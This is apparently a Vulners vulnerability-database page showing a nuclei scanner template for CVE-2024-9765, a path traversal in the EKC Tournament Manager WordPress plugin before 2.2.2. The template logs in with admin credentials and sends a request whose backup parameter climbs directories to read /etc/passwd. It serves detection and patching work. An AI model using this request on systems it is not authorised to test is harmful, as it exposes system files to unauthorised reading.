Lucene search
K

EKC Tournament Manager WordPress plugin - Path Traversal

🗓️ 03 Jul 2026 13:39:16Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 8 Views

Path traversal in EKC Tournament Manager plugin below 2.2.2 lets logged-in admins download files.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-9765
16 May 202520:34
circl
CNNVD
WordPress plugin EKC Tournament Manager 安全漏洞
15 May 202500:00
cnnvd
CVE
CVE-2024-9765
15 May 202520:07
cve
Cvelist
CVE-2024-9765 EKC Tournament Manager < 2.2.2 - Local File Download Vulnerability
15 May 202520:07
cvelist
EUVD
EUVD-2025-15201
3 Oct 202520:07
euvd
NVD
CVE-2024-9765
15 May 202520:16
nvd
Patchstack
WordPress EKC Tournament Manager plugin < 2.2.2 - Admin+ Arbitrary File Download vulnerability
19 May 202503:59
patchstack
Positive Technologies
PT-2025-21550
15 May 202500:00
ptsecurity
RedhatCVE
CVE-2024-9765
17 May 202521:03
redhatcve
Vulnrichment
CVE-2024-9765 EKC Tournament Manager < 2.2.2 - Local File Download Vulnerability
15 May 202520:07
vulnrichment
Rows per page
id: CVE-2024-9765

info:
  name: EKC Tournament Manager WordPress plugin - Path Traversal
  author: Sourabh-Sahu
  severity: medium
  description: |
    EKC Tournament Manager WordPress plugin < 2.2.2 contains a path traversal caused by insufficient validation, letting logged in admin users download system files outside the WordPress directory.
  impact: |
    Logged in admin users can download arbitrary system files, potentially exposing sensitive information.
  remediation: |
    Upgrade to version 2.2.2 or later.
  reference:
    - https://wpscan.com/vulnerability/c86157b0-43f3-4e82-9697-7dd9401b48d6/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2024-9765
    cwe-id: NVD-CWE-noinfo
    epss-score: 0.01414
    epss-percentile: 0.69472
    cpe: cpe:2.3:a:lukashuser:ekc_tournament_manager:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: lukashuser
    product: ekc_tournament_manager
  tags: cve,cve2024,lukashuser,ekc-tournament-manager,authenticated,lfi,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to=

    matchers:
      - type: dsl
        dsl:
          - contains(header, "wordpress_logged_in")
        internal: true

  - raw:
      - |
        GET /wp-admin/admin.php?page=ekc-backup&action=download&backup=../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - regex('root:.*:0:0:', body)
        condition: and
# digest: 4a0a00473045022100e6834ac66c093ed7f65a160720823b2dd64dad0a77c5ac397b85ff13ecf70e5f0220665657bdddd1d4711f0ffbd58095b72b84771edd5125bf3ea9d880f1217126bf:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

23 Feb 2026 05:00Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.16.5
EPSS0.01414
SSVC
8